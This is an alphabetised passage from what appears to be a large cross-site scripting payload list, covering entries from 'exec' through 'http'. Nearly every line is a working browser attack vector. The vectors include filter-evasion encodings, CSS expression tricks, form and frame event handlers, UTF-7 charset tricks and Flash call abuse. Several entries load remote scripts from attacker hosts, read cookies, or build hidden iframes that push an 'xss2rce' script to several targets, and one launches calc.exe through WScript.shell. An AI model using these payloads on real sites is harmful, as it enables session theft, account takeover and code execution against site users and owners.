- <! — #exec cmd=”/bin/echo ‘<SCRIPT SRC’” →<! — #exec cmd=”/bin/echo ‘=http://ha.ckers.org/xss.js></SCRIPT>'"-->
- <! — #exec cmd=”/bin/echo ‘<SCRIPT SRC’” →<! — #exec cmd=”/bin/echo ‘=http://xss.cx/xss.js></SCRIPT>'"-->
- <! — #exec cmd=”/bin/echo ‘<SCRIPT SRC’” →<! — #exec cmd=”/bin/echo ‘=http://xss.ha.ckers.org/a.js></SCRIPT>;'"-->
- <! — #exec cmd=”/bin/echo ‘<SCRIPT SRC’” →<! — #exec cmd=”/bin/echo ‘=http://xxxx.com/xss.js></SCRIPT>'"-->
- execScript()
- Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
- Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
- $ exiftool -Artist=’”><img src=1 onerror=alert(1)>’ FILENAME.jpeg
- exiftool -Artist= ><img src=1 onerror=alert(document.domain)> brute.jpeg
- ‘,expanded:’\x2F’},function(file){path = file;document.getElementById(“pathbox”).value = path;});prompt(document.location);$(‘#fileTreeDemo_1’).fileTree({script:’../../administrator/ajaxtree/jqueryFileTree.cfm?type=dir
- exp/*<A STYLE_NeatHtmlReplace=’no\xss:noxss(“*//*”);xss:ex/*XSS*//*/*/pression(alert(“XSS”))’
- exp/*<A STYLE=’no\xss:noxss(“*//*”);
- exp/*<A STYLE=’no\xss:noxss(“**”);
- exp/*<A STYLE=’no\xss:noxss(“*//*”); xss:ex/*XSS*//*/*/pression(alert(“XSS”))’>
- exp/*<A STYLE=’no\xss:noxss(“*//*”);xss:ex/*XSS*//*/*/pression(alert(“XSS”))’>
- exp/*<A STYLE=’no\xss:noxss(“*//*”);xss:ex/*XSS*//*/*/pression(alert(“XSS”))’>
- exp/*<A STYLE=’no\xss:noxss(“*//*”);xss:ex/*XSS*//*/*/pression(document.vulnerable=true)’>
- exp/*<A STYLE=’no\xss:noxss(\”*//*\”);
- exp/*<XSS STYLE='no\xss:noxss("*//*");
- exppression(alert(“XSS”))’>
- expr\65ssion(alert(1))
- expression(alert(‘XSS’));
- expressionG/style=[^<]*((expression\s*?[<]??)|(behavior\s*:))[^<]*(?=\>)/Uis
- expression(open(alert(1)))
- expression:/style=[^<]*((expression\s*?[<]??)|(behavior\s*:))[^<]*(?=\>)/Uis
- expression <style>*{font-family:’Serif}’;x[value=expression(alert(URL=1));]{color:red}</style>
- exp/*<;XSS STYLE=’;no\xss:noxss(“;*//*”;);
- exp/*<XSS ?STYLE=’no\xss:noxss(“*//*”); ?
- exp/*<XSS STYLE=’no\xss:noxss(“*//*”);
- exp/*<XSS STYLE=’no\xss:noxss(“*//*”);xss:ex/*XSS*//*/*/pression(alert(“XSS”))’>
- ExternalInterface.call(“console.log”,q);
- ExternalInterface.call(“document.write”,”<script>confirm(1)</script>”);
- ExternalInterface.call(“eval”,”myWindow=window.open(‘’,’’,’width=200,height=100'); myWindow.document.write(\”<html><head><script src=\’http://xss.cx/xss.js\'></script></head><body>hi</body></html>\");myWindow.focus()");
- ExternalInterface.call(“setTimeout”, ExternalInterface.objectID + ‘_event’ + “(‘“ + eventName + “‘,” + eventValues + “)”, 0);
- external.NavigateAndFind(‘ ‘,[],[])
- external.NavigateAndFind(‘http://xss.cx',[],[])
- extra1 <tag extra2 handler=code> extra3
- extra1 <tag spacer1 extra2 spacer2 handler spacer3 = spacer4 code spacer5> extra3
- extra1 <tag spacer1 handler spacer3 = spacer4 code spacer5 extra2> extra3 (without spacer2)
- F0ZUVsZW1lbnQoL3NjcmlwdC8uc291cmNlKSkuc3JjPWF0b
- %F6%3Cimg+onmouseover=prompt(/test/)//%F6%3E
- ( false + "" )[1] = "a"
- false + "" = "false"
- [F,A,L,S,E, T,R,U,E] = [!!0] + !0;
- [F,A,L,S,E, T,R,U,E] = [!!0] + !0;A+L+E+R+T;
- [F,B,Z,S,J, O,W,U,E] = [!!0] + !0;
- [F,B,Z,S,J, O,W,U,E] = [!!0] + !0;B+Z+J+W+O;
- [F,B,Z,S,J,O,W,U,E] = [!!0] + !0;eval(eval(“window.B+Z+window.J+window.W+O+’(0b10100111001??_�V)
- f=document.createElement(iframe);
- fetch(‘//0’).then(function(r){r.text().then(function(w){write(w)})})
- f=’file=akismet/index.php’
- Filename=”<<script>alert(‘xss’)<! — a →a.jpg”
- [][`filter`][`constructor`](`ale`.concat(`rt\x28`.concat`0\x29`))();//
- [].filter.constructor(‘ale’+’rt(4)’)();
- Firefox clipboard-hijack without script and css : http://<img alt=”evil/#” width=0 height=0 >
- Firefox cookie xss: with(document)cookie=’???��???��?????��????????��??????��?’,write(cookie);
- FireFox: this[Object[“keys”](this)[5]](1)
- firefoxurl:test|”%20-new-window%20javascript:alert(\’Cross%2520Browser%2520Scripting!\’);”
- Firefox (\x09, \x0a, \x0d, \x20)
- five={{insert(me._nodes.0.scriptprop)}}
- flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}//
- flash.external.ExternalInterface.call(alert, XSS);
- flash.external.ExternalInterface.call(eval, cmd);
- flash.Lib.getURL(new flash.net.URLRequest(flash.Lib._root.url||”javascript:alert(1)”),flash.Lib._root.name||”_top”);
- flash.Lib.getURL(new flash.net.URLRequest(flash.Lib._root.url||”javascript:alert(1)”),flash.Lib._root.name||”_top”)
- flashmediaelement.swf?jsinitfunctio%25gn=alert(1)
- flashmediaelement.swf?jsinitfunctio%gn=alert`1`
- fo.appendChild(i);
- fo = document.createElement(form);
- fo.elements[0].value=follow;
- ?FollowSite=0&SiteName=’-confirm(document.domain)-’
- font-family:a/**/ression(alert(1))(‘\’)exp\’)
- font-family:expression(alert)(1)
- “><font size=70 color=red>
- <font style=’color:expression(alert(1))’>
- <font style=’color:expression(alert(document.cookie))’>
- </font>/<svg><style>{src:’<style/onload=this.onload=confirm(1)>’</font>/</style>
- foo%00<script>alert(document.cookie)</script>
- foo\; alert(document.cookie);//;
- foo\��; alert(document.cookie);//��;
- ?foobar=<script>if
- foo\i; alert(document.cookie);//i;
- <! foo=”[[[Inception]]”><x foo=”]foo><script>alert(1)</script>”>
- <! foo=”[[[Inception]]”><x foo=”]foo><script>javascript:alert(1)</script>”>
- <! foo=”><script>alert(1)</script>”>
- <? foo=”><script>alert(1)</script>”>
- </ foo=”><script>alert(1)</script>”>
- foo<script>alert(1)</script>
- foo<script>alert(document.cookie)</script>
- foo<script>alert(/Xss-By-Muhaddi/)</script>
- foo<script>alert(/Xss/)</script>
- <? foo=”><script>confirm(1)</script>”>
- <! foo=”><script>javascript:alert(1)</script>”>
- <? foo=”><script>javascript:alert(1)</script>”>
- </ foo=”><script>javascript:alert(1)</script>”>
- “<foo>” + value + “</foo>”
- <! ‘=”foo”><x foo=’><img src=x onerror=alert(2)//’>
- <!’=”foo”><x foo=’><img src=x onerror=alert(2)//’>
- <?’=”foo”><x foo=’><img src=x onerror=alert(2)//’>
- <? ‘=”foo”><x foo=’><img src=x onerror=alert(3)//’>
- <% foo><x foo=”%><script>alert(123)</script>”>
- <? foo=”><x foo=’?><script>alert(1)</script>’>”>
- <% foo><x foo=”%><script>alert(1)</script>”>
- <? foo=”><x foo=’?><script>javascript:alert(1)</script>’>”>
- <% foo><x foo=”%><script>javascript:alert(1)</script>”>
- <! foo=”[[[x]]”><x foo=”]foo><script>alert(1)</script>”>
- for(;D<15;)C+=!d[D+=4]
- for(;D<19;)C+=!d[D+=4]
- <foreignObject xlink:href=”data:text/xml,%3Cscript xmlns=’http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E"/>
- <foreignObject xlink:href=”javascript:alert(1)”/>
- for(i=0; i<targets.length; i++){
- for(i=10;i>1;i — )confirm(i);new ActiveXObject(“WScript.shell”).Run(‘calc.exe’,1,true);
- for(i in{????????????????:0})for(n in{constructor:0})[][?=n][?]
- for(i in{????????????????:0})for(n in{constructor:0})[][?=n][?](unescape([…escape(i)].filter((a,b)=>b%12<1|b%12>9?a:0).join([])))()
- for(i in{????????????????:0})for(n in{constructor:0})[][?=n][?](unescape([…escape(i)].filter((a,b)=>b%12<1|b%12>9?a:0).join([])))(
- for(i in n={????????????????:”constructor”})[][?=n[i]][?]
- for(i in n={????????????????:”constructor”})[][?=n[i]][?](unescape([…escape(i)].filter((a,b)=>b%12<1|b%12>9?a:0).join([])))()
- for((i)in(self))eval(i)(1)
- for(location of [‘javascript:alert(/ff/)’]);
- <formaction='data:text/html
- <formaction='data:text/html,<script>alert(1)</script>'><button>CLICK
- <formaction='data:text/html,<script>alert(1)</script>'><button>CLICK
- <form/action=’data:text/html,<script>alert(1)</script>’><button>CLICK
- <formaction=’data:text/html,<script>alert(1)</script>’><button>CLICK
- <form/action=’data:text/html,<script>alert(1)</script>’><button>CLICK // Mario
- <form action=’data:text/html,<script>confirm(1)</script>’><button>CLICK
- <form action=”http://brutelogic.com.br/chall/minified.php" method=”POST” enctype=”multipart/form-data”>
- <form action=http://brutelogic.com.br/chall/minified.php method=POST enctype=multipart/form-data>
- <form/action=ja	vascr	ipt:confirm(document.cookie)><button/type=submit>
- <form action=javascript:alert(165)><input type=submit>
- <form action=javascript:alert(1)><input type=submit>
- <form action=javascript:alert(1)><input type=submit>
- <form action=”Javascript:alert(1)”><input type=submit>
- <form action=”Javascript:alert(1)”><input type=submit> // Firefox, IE
- <form/action=javascript:alert(22)><input/type=submit>
- formaction=javascript:alert(21)>M
- <form/action=javascript:eval(setTimeout(confirm(1)))><input/type=submit>
- //<form/action=javascript:alert(document.cookie)><input/type=’submit’>//
- //<form/action=javascript:confirm(document.cookie)><input/type=’submit’>//
- <form action=”javas	cript:confirm(1)” method=”get”><input type=”submit” value=”Submit”></form>
- <form action=’java	scri	pt:confirm(1)’><button>CLICK
- form.action = ‘<?php echo $url; ?>’
- <form><a href=”javascript:\u0061lert(1)”>X
- <form><a href=”javascript:\u0061lert(1)”>X
- <form><a href=”javascript:\u0061lert(1)”>X</script><img/*/src=”worksinchrome:prompt(1)”/*/onerror=’eval(src)’>
- form.appendChild(e);
- <form><button
- <form><button formaction=”javascript:alert(123)”>crosssitespt
- <form><button formaction=javascript:alert(167)>click
- <form><button formaction=javascript:alert(1)>click
- <form><button formaction=javascript:alert(1)>click
- <form><button formaction=”javascript:alert(1)”>//INJECTX
- <form><button formaction=”javascript:alert(73)%%0D3C! —
- <form><button formaction=”javascript:alert(XSS)”>lol
- <form><button formaction=javascript:alert(1)>CLICKME
- <form><button formaction=javascript:alert(1)>CLICKME
- <Form> <button formaction = javascript & colon; alert (1)> CLICKME
- <form><button formaction=javascript:alert(1)>M
- <form><button formaction=javascript:confirm(1)>CLICKME
- <form><button formaction=”javascript:javascript:alert(1)”>X
- form = document.createElement(‘form’);
- <form formaction=popup=1; onclick=popup=1;><object>
- <form href=’x’onclick=popup=1;><select>
- form.id = ‘form_xss’;
- <form id=”myform” value=”” action=javascript	:eval(document.getElementById(‘myform’).elements[0].value)><textarea>confirm(1)</textarea><input type=”submit” value=”Absenden”></form>
- <form id=”test” /><button form=”test” formaction=”javascript:alert(123)”>TESTHTML5FORMACTION
- <form id=”test” /><button form=”test” formaction=”javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32))”>X
- <form id=”test” /><button form=”test” formaction=”javascript:javascript:alert(1)”>X
- <form id=”test”></form><button form=”test” formaction=”javascript:alert(1)”>X</button>
- <form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
- <form><iframe 	  src=”javascript:alert(1)” 	;>
- <form><iframe 	  src=”javascript:confirm(1)” 	;>
- <form><iframe src=”javascript:alert(1)” ;>
- <form><input formaction=javascript:alert(168) type=submit value=click>
- <form><input formaction=javascript:alert(169) type=image value=click>
- <form><input formaction=javascript:alert(170) type=image src=SOURCE>
- <form><input formaction=javascript:alert(1) type=image src=http://brutelogic.com.br/webgun/img/youtube1.jpg>
- <form><input formaction=javascript:alert(1) type=image src=SOURCE>
- <form><input formaction=javascript:alert(1) type=image src=SOURCE>
- <form><input formaction=javascript:alert(1) type=image value=click>
- <form><input formaction=javascript:alert(1) type=image value=click>
- <form><input formaction=javascript:alert(1) type=submit value=click>
- <form><input formaction=javascript:alert(1) type=submit value=click>
- ?</form><input type=”date” onfocus=”alert(1)”>
- <form><input type=”image” value=”submit” formaction=//goo.gl/nlX0P>
- <form><input type=submit formaction=//xss.cx><textarea name=x>
- <form><isindex formaction=”javascript:confirm(1)”
- <form><isindex formaction=”java	s&NewLine&cript:confirm(1)”>
- form.method=’POST’;
- <form method=post action=”//brutelogic.com.br/tests/comments.php”
- <form method=post onclick=elements[0].value=outerHTML;submit()>
- <form name=location >
- <form oninput=alert(1)></input></form>
- <form oninput=”alert(1)”><input type=”range”
- <form onsubmit=alert(105)><input type=submit>
- <form onsubmit=alert(1)><input type=submit>
- <form onsubmit=alert(23)><button>M
- form.target = ‘frame_xss’;
- <form><textarea onkeyup=’\u0061\u006C\u0065\u0072\u0074(1)’>
- <form><textarea onkeyup=’\u0061\u006C\u0065\u0072\u0074(1)’>
- for(n in{constructor:0})[][?=n][?](/alert(1)/.source)()
- for([]o\u{66}!\u{61}\u{6c}\u{65}\u{72}\u{74}`1`)\u{66}
- For([]o\u{66}!\u{61}\u{6c}\u{65}\u{72}\u{74}`1`)\u{66}
- fo.setAttribute(action, profile.php?id=100);
- fo.setAttribute(method, post);
- fo.setAttribute(target, myFrame);
- fo.submit();
- four=”{{set(‘insert’,me.root.ownerbody.appendChild)}}”
- frame = document.createElement(‘iframe’);
- frame.name=’frame_xss’;
- <FRAMESET><FRAME id=XSS SRC=”javascript:alert(‘XSS’);”></FRAMESET>
- <FRAMESET><FRAME id=XSS SRC=\”javascript:alert(‘XSS’);\”></FRAMESET>
- <FRAMESET><FRAME RC=””+”javascript:confirm(5);”></FRAMESET>
- <FRAMESET><FRAME SRC=”javascript:alert(1);”></FRAMESET>
- <FRAMESET><FRAME src=javascript:alert(‘XpSS’)></FRAME></FRAMESET>
- <FRAMESET><FRAME SRC=javascript:alert(‘XSS’)></FRAME></FRAMESET>
- <;FRAMESET>;<;FRAME SRC=”;javascript:alert(‘;XSS’;);”;>;<;/FRAMESET>;
- <FRAMESET><FRAME ?SRC=”javascript:alert(‘XSS’) ?;”></FRAMESET>
- <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
- <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
- <FRAMESET><FRAME SRC=\”javascript:alert(‘XSS’);\”></FRAMESET>
- <FRAMESET><FRAME SRC=”javascript:confirm(5);”></FRAMESET>
- <FRAMESET><FRAME SRC=”javascript:document.vulnerable=true;”></frameset>
- <FRAMESET><FRAME SRC=”javascript:javascript:alert(1);”></FRAMESET>
- <frameset><frame src onload=alert(1)>
- <frameset><frame/src=//xss.cx>
- <frameset><frame src=”xss”></frameset>
- <frameset id=”x”onload=popup=1;>
- <frameset onBlur frameset onBlur=”javascript:javascript:alert(1)”></frameset onBlur>
- <frameset onFocus frameset onFocus=”javascript:javascript:alert(1)”></frameset onFocus>
- <frameset onload=alert(1)>
- <frameset onload=alert(123)>
- <frameset onload=javascript:alert(1)>
- <frameset onload=javascript:javascript:alert(1)></frameset>
- <frameset onload=popup=1;>
- <frameset onpageshow=”alert(1)”>
- <frameset/onpageshow=alert(1)>
- <frameset onScroll frameset onScroll=”javascript:javascript:alert(1)”></frameset onScroll>
- frame.style=’visibility: hidden;’;
- fr = document.createElement(iframe);
- fr.setAttribute(name, myFrame);
- fr.setAttribute(style, display:none);
- f.setAttribute(style,display:none);
- f.src=//+targets[i]+/PATH/PAGE?PARAM=<script src=//DOMAIN/xss2rce.js>;
- \);function%20someFunction(a){}prompt(1)//
- Function(‘a=`${alert`’,’`}`){‘)()
- Function(‘a=alert``’,’’)()
- (function(a){alert(1)}).call()
- (function({a,b,c}={a:1,b:2,c:3}){alert(`${a},${b},${c}`)})()
- Function(‘a=[class A extends Function(‘,’}]){alert(1)’)()
- Function(‘){alert()//’, ‘’)();
- function() {alert(1)}
- function() {alert(1
- Function`$${`a${`l${`e${`r${`t${`(${`1${`)`}`}`}`}`}`}`}`}$```
- Function`alert(1)```````````
- Function(“ale”+”rt(1)”)();
- Function{}(‘alert(1)’)``
- (function(){alert(9)})()
- Function(“a=`”,”`,xss=1){alert(xss)”)()
- functionBody = “with($context){with($data||{}){return{“ +rewrittenBindings + “}}}”;
- function(){code}
- (function{}).constructor
- function document::onreadystatechange(){alert(1);}
- (function { eval(‘var a=1’); }); alert(typeof a);
- function filter($value) {return preg_replace($this->_expressions, ‘’, $value);
- function::[‘location’]=’javascript’’:alert(/FF/)’
- !function(lol=alert(1)){}()
- Function.prototype.toString=Function.prototype.call;”alert(1)//”.replace(“//”,Function)
- Function(‘x=alert`1`’,’y’)()
- function xss(why,){}//
- f=(x=alert(1))=>{}; f();
- f=(x=alert(1))=>{};f();
- +g,a=C[A]+C[+!A],A]+a])() [g[A]+g[A+A]+C[E]+a](A)
- Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,’window’)(),’document’)(), ‘getElementsByTagName’)(‘html’)[0],’innerHTML’)().match(/d.*’/));</script>
- gbk charset:%bb\”alert(1)
- Generic Source Breaking
- $.get(‘//0’,function(r){write(r)})>
- $.getScript(‘//0’)
- ?getURL,javascript:alert(1)”,
- ?getURL(javascript:alert(1))”,
- #getURL,javascript:alert(1)”,
- getURL(“javascript:alert(‘X9SS’)”)
- getURL(“javascript:alert(‘XSS’)”)
- getURL(“javascript:confirm(document.location)”)
- ?getURLValue=javascript:alert(1)”,
- GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
- g’”></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250
- <g onload=��javascript:alert(9)��></g></svg>
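- Google Chrome XSS Auditor Bypass (up to v51; historical: the XSS Auditor was removed in Chrome 78, so context-aware output encoding and a Content-Security-Policy are the controls to rely on, not a browser-side filter)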
- ?goto=javascript:alert(1)”,
- ?goto,javascript:alert(1)”,
- #goto,javascript:alert(1)”,
- >
- >
- >
- >
- <h1><font color=”#00FF00">Ege was here :)</font></h1>
- <h1><font color=blue>hellox worldss</h1>
- <h1>Hello,<script>alert(1)</script>!</h1>
- <h1>Hello, <script>alert(1)</script>!</h1>
- “><h1><IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>”>123</h1>
- “><h1><IFRAME SRC=# onmouseover=”alert(document.cookie)”></IFRAME>123</h1>
- ><h1><IFRAME width=”420" height=”315" frameborder=”0" onmouseover=”document.location.href=’https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr
- “><h1><iframe width=”420" height=”315" src=”http://www.youtube.com/embed/sxvccpasgTE" frameborder=”0" allowfullscreen></iframe>123</h1>
- “><h1><IFRAME width=”420" height=”315" SRC=”http://www.youtube.com/embed/sxvccpasgTE" frameborder=”0" onmouseover=”alert(document.cookie)”></IFRAME>123</h1>
- <h1>INJECTX</h1>
- <h1><marquee><b><u><i>XSS</i></u></b></marquee></h1>
- <h1 _-_-_-ng_-_-_click=”$event.view.location.replace(‘javascript:alert(1)’)”>XSS</h1>
- <h1/onclick=alert(1)>a//INJECTX
- ><h1/onclick=a\u006cer\u0074(/Xss-By-Muhaddi/)>Click Me</h1>
- ��><h1/onclick=a\u006cer\u0074(/Xss-By-Muhaddi/)>Click Me</h1>
- ><h1/onclick=a\u006cer\u0074(/xss-by-shawar/)>clickme</h1>
- “><h1 onclick=co\u006efir\u006d(1)>Clickme</h1>
- “><h1 onclick=prompt(1)>Clickme</h1>
- “><h1/ondrag=co\u006efir\u006d`1`)>DragMe</h1>
- <h1 onerror=alert(/@0x6D6172696F/)>XSS</h1><style>*:after{content:url()}</style>
- <h1/onmouseover=’alert(1)’>renwa
- <h1/onmouseover=’alert(1)’>Renwa
- ><h1 onmouseover=alert(Xss-By-Muhaddi)>Hover Me</h1>
- ><h1 onmouseover=alert(Xss)>Hover Me</h1>
- ��><h1 onmouseover=alert(��Xss��)>Hover Me</h1>
- “><h1/onmouseover=’\u0061lert(1)’>
- [‘<h1>Payload</h1>’,’<script>alert(/HOLA/);</script>’]
- “><h2 id=”Iamheading”onmouseover=”confirm(1)”>
- <handler id=”y”>alert(1)</handler>
- <handler xmlns:ev=”http://www.w3.org/2001/xml-events" ev:event=”load”>alert(1)</handler>
- <head><base href=”javascript://”></head><body><a href=”/. /,alert(1)//#”>XXX</a></body>
- <head><base href=”javascript://”/></head><body><a href=”/. /,alert(1)//#”>XXX</a></body>
- <head><base href=”javascript://”></head><body><a href=”/. /,javascript:alert(1)//#”>XXX</a></body>
- head -c 1000000 /dev/urandom
- head -c 1000000 /dev/urandom > /tmp/bin.bin
- header(‘Refresh: 0;url=javascript:alert(1)’);
- header(‘Refresh: 0;url=javascript:confirm(1)’);
- <;HEAD>;<;META HTTP-EQUIV=”;CONTENT-TYPE”; CONTENT=”;text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(‘;XSS’;);+ADw-/SCRIPT+AD4-
- <HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7"></HEAD>+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4-
- <HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4-
- <HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4-
- <HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-confirm(5);+ADw-/SCRIPT+AD4-
- <head><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
- <HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
- <HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7"> </HEAD><SCRIPT>alert(‘XSS’);</SCRIPT>
- Hello @Html.Raw(MyValue)
- Hello <%= MyValue =>
- <! — Hello — world > <SCRIPT>confirm(1)</SCRIPT> →
- href=[0x0b]” onclick=alert(1)//
- href= action= formaction= location= on*= name= background= poster= src= code= data=
- href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4g>
- href=”data:text/html,<script>alert(document.domain)<
- href=javascript:alert(1)
- “ href=javascript:alert(1)
- href=javascript:alert(1)//>Click</a>
- “ href=javascript:alert(1) <math><!V
- href=vjavascript:alert(1)//v>Click</a>
- </html>
- </HTML>
- <;HTML>;<;BODY>;
- <HTML><BODY>
- <HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”>
- <HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2"><t:set attributeName=”innerHTML” to=”XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>”></BODY></HTML>
- <HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2"><t:set attributeName=”innerHTML” to=”XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>”></BODY></HTML>
- <HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2"><t:set attributeName=”innerHTML” to=”XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>”></BODY></HTML><HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2"><t:set attributeName=”innerHTML” to=”XSS<SCRIPT DEFER>alert(“XSS”)</SCRIPT>”></BODY></HTML>
- <HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2"><t:set attributeName=”innerHTML” to=”XSS<SCRIPT DEFER>alert(‘XSS’)</SCRIPT>”> </BODY></HTML>
- <html><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2"><t:set attributeName=”innerHTML” to=”XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>”></BODY></html>
- <html data-toggle=tab href=”<img src=k onerror=alert(66)>”>
- <html><noalert><noscript>(123)</noscript><script>(123)</script>
- <html><noalert><noscript>(XSS)</noscript><script>(XSS)</script>
- <html onMouseDown html onMouseDown=”javascript:javascript:alert(1)”></html onMouseDown>
- <html onMouseEnter html onMouseEnter=”javascript:parent.javascript:alert(1)”></html onMouseEnter>
- <html onMouseLeave html onMouseLeave=”javascript:javascript:alert(1)”></html onMouseLeave>
- <html onmousemove html onmousemove=”javascript:javascript:alert(1)”></html onmousemove>
- <html onMouseMove html onMouseMove=”javascript:javascript:alert(1)”></html onMouseMove>
- <html onMouseOut html onMouseOut=”javascript:javascript:alert(1)”></html onMouseOut>
- <Html Onmouseover=(alert)(1) //
- <html onmouseover html onmouseover=”javascript:javascript:alert(1)”></html onmouseover>
- <html onMouseOver html onMouseOver=”javascript:javascript:alert(1)”></html onMouseOver>
- <html onMouseUp html onMouseUp=”javascript:javascript:alert(1)”></html onMouseUp>
- <html onMouseWheel html onMouseWheel=”javascript:javascript:alert(1)”></html onMouseWheel>
- <html ontouchcancel=alert(1)>
- <html ontouchend=alert(1)>
- <html ontouchend=alert(1)>
- <html ontouchmove=alert(1)>
- <html ontouchmove=alert(1)>
- <html ontouchstart=alert(1)>
- <html ontouchstart=alert(1)>
- <html:script>javascript:alert(1);</html:script></html:html>
- </html></script> // XML inside JS
- htmlspecialchars($_REQUEST[q], ENT_QUOTES);
- htmlStr = ‘<a href=”’+*dataentities*+’javascript:123">test</a>’; document.getElementById(‘placeholder’).innerHTML = htmlStr; try { if(document.getElementById(‘placeholder’).firstChild.protocol === ‘javascript:’) { customLog(*dataentities*); } }catch(e){};
- htmlStr = ‘<a href=”javascript’+*dataentities*+’:123">test</a>’; document.getElementById(‘placeholder’).innerHTML = htmlStr; try { if(document.getElementById(‘placeholder’).firstChild.protocol === ‘javascript:’) { customLog(*dataentities*); } }catch(e){};
- htmlStr = ‘<a href=”javascript’+*dataentities*+’123">test</a>’; document.getElementById(‘placeholder’).innerHTML = htmlStr; try { if(document.getElementById(‘placeholder’).firstChild.protocol === ‘javascript:’) { customLog(*dataentities*); } }catch(e){};
- <html><title>{alert(‘xss’)}</title></html>
- <;HTML xmlns:xss>;
- <HTML xmlns:xss>
- <HTML xmlns:xss><?import namespace=”xss” implementation=”%(htc)s”>
- <HTML xmlns:xss><?import namespace=”xss” implementation=”%(htc)s”><xss:xss>XSS</xss:xss></HTML>”””,”XML namespace.”),(“””<XML ID=”xss”><I><B><IMG SRC=”javas<! — →cript:javascript:alert(1)”></B></I></XML><SPAN DATASRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
- <HTML xmlns:xss><?import namespace=”xss” implementation=”http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
- <HTML xmlns:xss><?import namespace=”xss” implementation=”http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss</html>
- <HTML xmlns:xss><?import namespace=”xss” implementation=”http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html>
- );HTP.PRINT(:1); —
- );HTP.PRINT(:1); — =pwned<svg/onload=prompt(‘XSS\u0020via\u0020sql\u0020injection’)>
- “h”+”t”+”t”+”p”,
- “h”+”t”+”t”+”p”A
- http://a/%%30%30
- http://aa<script>alert(123)</script>
- http://aa'><script>alert(123)</script>
- http://aa"><script>alert(123)</script>
- @brutelogic.com.br/webgun/test.php?p=”>http://alert(1)@brutelogic.com.br/webgun/test.php?p=<svg+onload=eval(URL.slice(7,15))>
- http://brutelogic.com.br/webgun/test.php?p=<brute id=test onmouseover=alert(1)>AAAA
- http://brutelogic.com.br/webgun/test.php?p=<brute onmouseover=pop(1)>AAAA
- http://brutelogic.com.br/webgun/test.php?p=<script src=//3334957647/1>
- http://domain/page?p=%26p=%26lt;svg/onload=alert(1)%3E%3Cj%20onclick=location%2B=document.body.textContent%3Eclick%20me![BODY_CONTENT]&p=<svg/onload=alert(1)>click me!
- http://domain/page?p=%26p=%26lt;svg/onload=alert(1)><j%20onclick=location%2B=document.body.textContent>click%20me![BODY_CONTENT]&p=<svg/onload=alert(1)>click me!
- http://domain/page?p=%3Cj%20onclick=location%2B=textContent%3E%26p=%26lt;svg/onload=alert(1)%3E&p=<svg/onload=alert(1)>
- http://domain/page?p=%3Cj%26p=%3Csvg%2Bonload=alert(1)%20onclick=location%2B=outerHTML%3Eclick%20me!<j&p=<svg+onload=alert(1) onclick=location+=outerHTML>
- http://DOMAIN/PAGE.php/"><svg onload=alert(1)>
- http://domain/page?p=<j%20onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)>&p=<svg/onload=alert(1)>
- http://domain/page?p=<j%26p=<svg%2Bonload=alert(1)%20onclick=location%2B=outerHTML>click%20me!<j&p=<svg+onload=alert(1) onclick=”location+=outerHTML”>
- http://domain/page?p=<script/src=//3237054390/1+
- http://domain/page?p=<svg/onload=alert(1)>
- http://domain/page?p=<svg/onload=alert(1)+
